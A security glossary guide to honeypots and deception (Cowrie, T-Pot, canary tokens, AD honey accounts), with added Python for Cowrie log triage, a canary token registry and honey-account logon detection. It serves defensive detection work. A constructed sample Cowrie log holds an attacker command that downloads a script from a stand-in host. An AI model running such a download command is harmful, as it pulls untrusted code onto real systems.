Detection & Response Glossary
Honeypot and Deception Technology - Exposing Attackers Early
A practical guide to implementing deception infrastructure: honeypots (Cowrie, T-Pot) for network detection, canary tokens for files and AD credentials, and commercial platforms (Attivo, Illusive). This guide supplements the basic entry on honeypots and the conceptual entry on deception technology with concrete deployment instructions.
Honeypots have the highest signal-to-noise ratio of any security tool: every attempt to access a honeypot is a genuine attack. There are no false positives—legitimate users never interact with honeypots.
Honeypot Types and Deployment
Classification by interaction level:
Low-Interaction Honeypots:
→ Emulate specific services (SSH, HTTP, SMB)
→ Collect: login attempts, exploits used, attacker IPs
→ Risk: low (no real shell)
→ Tools: Honeyd, Dionaea, Glastopf
Deployment:
→ Internet-facing: collect attacker IPs, exploit attempts
→ Internal: detects network scans (who is scanning the honeypot?)
High-Interaction Honeypots:
→ Full-fledged system (physical or VM)
→ Attacker can actually log in, execute code
→ Collects: attacker’s complete TTPs
→ Risk: attacker could pivot → Isolation required!
Use:
→ Security research
→ TTP collection for threat intelligence
→ Deploy with extreme caution!
Cowrie (SSH/Telnet honeypot):
# Docker:
docker run -p 22:2222/tcp -p 23:2223/tcp cowrie/cowrie
# What Cowrie records:
→ Login attempts (username + password)
→ SSH key fingerprints
→ Executed commands (in fake shell)
→ Download attempts
→ Lateral movement attempts
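The record types listed above are what Cowrie writes to its JSON log. The following added example (not part of the page or of the Cowrie project) groups those events by attacker IP and triages them; the event names follow Cowrie's "eventid" convention (cowrie.login.failed, cowrie.command.input, cowrie.session.file_download), and the log lines are constructed sample data, not output captured from a live honeypot.

```python
# Added example (not part of the page or of the Cowrie project): summarise
# Cowrie's JSON log per attacker IP. Event names follow Cowrie's "eventid"
# convention; the log lines below are constructed for the demo.
import json
from collections import Counter

# Constructed sample of cowrie.json lines (documentation-range IPs, fake URL).
SAMPLE_COWRIE_LOG = """\
{"eventid": "cowrie.session.connect", "src_ip": "203.0.113.7", "session": "a1", "timestamp": "2026-01-10T03:12:01Z"}
{"eventid": "cowrie.login.failed", "src_ip": "203.0.113.7", "session": "a1", "username": "root", "password": "123456"}
{"eventid": "cowrie.login.success", "src_ip": "203.0.113.7", "session": "a1", "username": "root", "password": "password"}
{"eventid": "cowrie.command.input", "src_ip": "203.0.113.7", "session": "a1", "input": "uname -a"}
{"eventid": "cowrie.command.input", "src_ip": "203.0.113.7", "session": "a1", "input": "wget http://198.51.100.9/x.sh"}
{"eventid": "cowrie.session.file_download", "src_ip": "203.0.113.7", "session": "a1", "url": "http://198.51.100.9/x.sh", "shasum": "<constructed>"}
{"eventid": "cowrie.login.failed", "src_ip": "198.51.100.22", "session": "b2", "username": "admin", "password": "admin"}
{"eventid": "cowrie.login.failed", "src_ip": "198.51.100.22", "session": "b2", "username": "admin", "password": "admin"}
{"eventid": "cowrie.session.closed", "src_ip": "198.51.100.22", "session": "b2"}
"""


def _new_summary():
    return {"sessions": set(), "logins_failed": 0, "logins_ok": 0,
            "credentials": [], "commands": [], "downloads": []}


def summarize_cowrie(log_text):
    """Group Cowrie events by src_ip and collect what the page lists as
    Cowrie's output: login attempts, commands typed in the fake shell and
    download attempts. Malformed lines are skipped, not fatal."""
    by_ip = {}
    for line in log_text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue
        ip = ev.get("src_ip")
        if not ip:
            continue
        s = by_ip.setdefault(ip, _new_summary())
        if ev.get("session"):
            s["sessions"].add(ev["session"])
        eid = ev.get("eventid", "")
        if eid == "cowrie.login.failed":
            s["logins_failed"] += 1
            s["credentials"].append((ev.get("username"), ev.get("password")))
        elif eid == "cowrie.login.success":  # "success" against the fake shell only
            s["logins_ok"] += 1
            s["credentials"].append((ev.get("username"), ev.get("password")))
        elif eid == "cowrie.command.input":
            s["commands"].append(ev.get("input", ""))
        elif eid == "cowrie.session.file_download":
            s["downloads"].append(ev.get("url", ""))
    return by_ip


def severity(summary):
    """Triage: post-login activity outranks pure credential guessing."""
    if summary["commands"] or summary["downloads"]:
        return "high"
    if summary["logins_failed"] or summary["logins_ok"]:
        return "medium"
    return "low"


def top_credentials(by_ip, n=3):
    """Most-tried username/password pairs across all attackers; useful as a
    "do any of these actually work in our estate?" check."""
    counts = Counter(c for s in by_ip.values() for c in s["credentials"])
    return counts.most_common(n)


if __name__ == "__main__":
    report = summarize_cowrie(SAMPLE_COWRIE_LOG)
    for ip, s in report.items():
        print(f"{ip}: severity={severity(s)} failed={s['logins_failed']} "
              f"ok={s['logins_ok']} commands={len(s['commands'])} "
              f"downloads={len(s['downloads'])}")
    print("most tried credentials:", top_credentials(report))
```

Because no legitimate user ever reaches the honeypot, every IP in the report is a candidate for blocking or for enrichment in threat intelligence; the severity split only decides which sessions an analyst reads first.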
T-Pot (Multi-Honeypot Platform):
→ 20+ honeypots in one (Cowrie, Dionaea, Elasticpot, etc.)
→ ELK Stack: Visualization of all attacks
→ Threat Map: Where do attacks come from?
Canary Tokens: Deception in the Corporate Network
Canary Tokens - the simplest deception measure:
Concept: Distribute tokens/traps everywhere
→ No attacker knows: what is real, what is a trap?
→ Cost: almost zero (many are free!)
→ Signal: 100% false-positive-free (never triggered by legitimate users!)
Canary Token Types (canarytokens.org - free!):
Web Token (HTTP):
→ Fake URL in document: when accessed → Alert
→ In email inbox, Word documents, presentations
→ "ContractTemplate.docx" contains token → opened by AMS.exe?
DNS Tokens:
→ Fake domain: lookup = Alert
→ Stored in password manager (as "backup server")
→ If attacker copies password manager and connects → ALERT!
Cloned Website Tokens:
→ Clone of login page (fake)
→ Attacker sees login page → enters credentials → Alert!
AWS Keys (Fake):
→ Fake AWS Access Key in code or config
→ Any API request using these keys → immediate alert
→ Where was the key stored? Compromised!
SQL Server Token:
→ Fake table/view: when queried → Alert
→ In production DB as table/view "customer_exports"
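To make the Web and DNS token types above concrete, here is an added example of a minimal self-hosted token registry. It is not the page's code and not canarytokens.org's implementation; CANARY_DOMAIN is an assumed placeholder for a domain whose authoritative DNS and web server you operate, and the class names and methods are this example's own.

```python
# Added example, not the page's or canarytokens.org's code: a minimal
# self-hosted canary token registry covering the Web (HTTP) and DNS token
# types. A token is a random id tied to a memo saying where it was planted;
# any request for its URL or any lookup of its hostname is an alert.
import secrets
from datetime import datetime, timezone

CANARY_DOMAIN = "canary.example.invalid"  # assumption: a domain you control


class CanaryRegistry:
    def __init__(self):
        self._tokens = {}   # token id -> memo (where the token was planted)
        self.alerts = []

    def create(self, memo):
        """Mint a token. 64 random bits: not guessable, not enumerable."""
        token = secrets.token_hex(8)
        self._tokens[token] = memo
        return token

    def web_url(self, token):
        """Web token: embed this URL in a document, e-mail or presentation."""
        return f"https://{CANARY_DOMAIN}/t/{token}/index.html"

    def dns_name(self, token):
        """DNS token: store this as e.g. a "backup server" in a password manager."""
        return f"{token}.{CANARY_DOMAIN}"

    def on_http_request(self, path, src_ip, user_agent=None):
        """Call from the web listener for every request. Returns alert or None."""
        parts = path.strip("/").split("/")
        if len(parts) >= 2 and parts[0] == "t":
            return self._fire(parts[1], "http", src_ip, user_agent=user_agent)
        return None

    def on_dns_query(self, qname, src_ip):
        """Call from the authoritative DNS server for every query.
        src_ip is the resolver that asked, usually not the attacker's host."""
        qname = qname.rstrip(".").lower()
        suffix = "." + CANARY_DOMAIN
        if not qname.endswith(suffix):
            return None
        # the label directly under the canary domain carries the token id
        token = qname[:-len(suffix)].split(".")[-1]
        return self._fire(token, "dns", src_ip)

    def _fire(self, token, channel, src_ip, **extra):
        memo = self._tokens.get(token)
        if memo is None:
            return None   # unknown id: scanner noise, not one of our traps
        alert = {
            "priority": "high",   # page: canary alerts go straight to "high priority"
            "channel": channel,
            "token": token,
            "memo": memo,         # tells the SOC which document or store leaked
            "src_ip": src_ip,
            "time": datetime.now(timezone.utc).isoformat(),
            **extra,
        }
        self.alerts.append(alert)
        return alert


if __name__ == "__main__":
    reg = CanaryRegistry()
    t = reg.create("ContractTemplate.docx on HR share")
    print("plant this URL:", reg.web_url(t))
    print(reg.on_http_request(f"/t/{t}/index.html", "203.0.113.5", "Mozilla/5.0"))
```

The memo is the part that matters operationally: the alert alone says "someone touched a trap", the memo says which document, share or password manager the trap came from, and that is the system to treat as compromised. Note that the DNS channel fires without any connection being made to the fake "backup server": resolving the name is the signal, and the source IP you see is the recursive resolver, not the attacker's machine.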
Active Directory Honey Credentials:
→ Fake AD account: looks legitimate, never used
→ Every login attempt = Indicator of Compromise!
# PowerShell: Create honey account:
New-ADUser -Name "svc-backup-old" `
-Description "Legacy Backup Service Account" `
-AccountPassword (ConvertTo-SecureString "..." -AsPlainText -Force) `
-Enabled $true `
-PasswordNeverExpires $true
# Alert: every authentication of this account → SOC alert (P1!)
Honey File on File Server:
"Confidential - Salaries_All_Employees_2026.xlsx"
→ Canarytokens Macro: if opened → Alert
→ Every time this file is opened = Indicator of an insider threat!
Deception Technology: Enterprise Solutions
Modern Deception Platforms:
Attivo Networks (SentinelOne ThreatDefend):
→ Automatic honeypot deployment across the network
→ Dynamic Deception: Honeypots look like real systems
→ AD Deception: Fake AD objects (users, GPOs, computers)
→ Integration: SIEM, SOAR (automatic isolation upon contact)
Illusive Networks (Proofpoint):
→ Focus: Detecting lateral movement
→ Fake credentials in memory (like real tokens)
→ When attackers steal and use credentials → Alert!
→ Zero false positives (conceptual advantage)
Canarytokens.org (free):
→ 20+ token types
→ No installation required
→ Ideal for: SMEs, first steps in deception
→ Limitation: no centralized management
Custom honeypot stack:
T-Pot + Canarytokens + AD honey accounts:
→ Costs: Hardware/VM + time
→ For: Tech companies, security teams
Legal aspects:
→ Honeypots: permitted in Germany (own network)
→ Collecting attacker data: non-critical within own network
→ NO "hacking back" (illegal!)
→ Data protection: IP addresses are personal data → retention limit (72h max?) or legitimate interest as the legal basis
→ Works council: for internal deployment → Works agreement
Implementing honey infrastructure
Step-by-step deception deployment:
Minimal setup (Day 1, free):
1. Visit canarytokens.org
2. Create HTTP token → embed in document
3. Create DNS token → add to password manager
4. AWS fake key → place in test repository (public!)
5. Configure email address for alerts
AD Honey Accounts (Week 1):
→ 3–5 fake accounts in different OUs
→ Names: sound legitimate (svc-backup, it-admin-old, etc.)
→ Event 4624 (Login Success): Immediate P1 alert!
→ Event 4625 (login failure): Alert (someone is trying)
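The honey account created with New-ADUser above and the 4624/4625 rule in this step need a detection that turns log events into the P1/P2 alerts. The following added example (not from the page or any vendor product) does that over newline-delimited JSON events: the field names EventID, TargetUserName, IpAddress, LogonType and WorkstationName are those of the Windows Security log, the HONEY_ACCOUNTS names are assumed to be the accounts you created, the P2 level for 4625 is this example's choice, and the event records are constructed sample data.

```python
# Added example, not from the page or any vendor product: detection logic for
# AD honey accounts. Matches Windows Security events 4624 (logon success) and
# 4625 (logon failure) against the honey account list and emits prioritised
# alerts. Records below are constructed sample data.
import json

# Assumption: the names you created with New-ADUser in the honey OUs.
HONEY_ACCOUNTS = {"svc-backup-old", "it-admin-old", "svc-sql-legacy"}
_HONEY_LOWER = {a.lower() for a in HONEY_ACCOUNTS}

SAMPLE_EVENTS = """\
{"EventID": 4624, "TargetUserName": "jdoe", "TargetDomainName": "CORP", "LogonType": 3, "IpAddress": "10.20.30.40", "WorkstationName": "WS-0042"}
{"EventID": 4625, "TargetUserName": "jdoe", "TargetDomainName": "CORP", "LogonType": 2, "IpAddress": "10.20.30.40", "WorkstationName": "WS-0042"}
{"EventID": 4625, "TargetUserName": "svc-backup-old", "TargetDomainName": "CORP", "LogonType": 3, "IpAddress": "10.20.30.77", "WorkstationName": "WS-0099"}
{"EventID": 4624, "TargetUserName": "SVC-BACKUP-OLD", "TargetDomainName": "CORP", "LogonType": 10, "IpAddress": "10.20.30.77", "WorkstationName": "WS-0099"}
{"EventID": 4634, "TargetUserName": "svc-backup-old", "TargetDomainName": "CORP", "LogonType": 10}
"""


def classify(event):
    """Return an alert dict if the event touches a honey account, else None."""
    user = str(event.get("TargetUserName", "")).lower()   # AD names are case-insensitive
    if user not in _HONEY_LOWER:
        return None   # real account: no deception signal here
    try:
        event_id = int(event.get("EventID", 0))
    except (TypeError, ValueError):
        return None
    if event_id == 4624:
        priority = "P1"
        reason = "successful logon with honey account: its credentials are in someone's hands"
    elif event_id == 4625:
        priority = "P2"
        reason = "failed logon against honey account: someone is trying the name"
    else:
        return None   # logoff, privilege assignment etc. are not the trigger
    return {
        "priority": priority,
        "event_id": event_id,
        "account": user,
        "source_ip": event.get("IpAddress", "-"),
        "workstation": event.get("WorkstationName", "-"),
        "logon_type": event.get("LogonType"),
        "reason": reason,
    }


def scan(log_text):
    """Run classify() over newline-delimited JSON events; keep only alerts."""
    alerts = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        try:
            alert = classify(json.loads(line))
        except json.JSONDecodeError:
            continue   # a broken line must not stop the rest of the batch
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"[{a['priority']}] {a['event_id']} {a['account']} from "
              f"{a['source_ip']} ({a['workstation']}): {a['reason']}")
```

The source IP and workstation in the alert are the first pivot for the post-incident question "which other systems were affected?". The rule only stays false-positive-free if the honey accounts are truly never used: exclude them from password audits, scheduled tasks and any scanner that authenticates with domain accounts, or the P1 arrives with a legitimate cause.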
Network honeypots (Month 1):
→ VM in every VLAN: listens for SSH, RDP, HTTP
→ Alert on connection attempt (no one should connect!)
→ T-Pot: collect all attack data centrally
Honey File Strategy:
→ 10 enticing file names (salaries, passwords, backups)
→ Canarytokens macro embedded
→ On file server: in folders that insiders can see
→ Normal user: NEVER needs these files
→ Insider/attacker: opens interesting files
Integration into SOC workflow:
→ All CanaryToken alerts → directly assigned "high priority" in SIEM
→ Playbook: CanaryToken triggered → immediate endpoint isolation
→ Post-incident: which other systems were affected?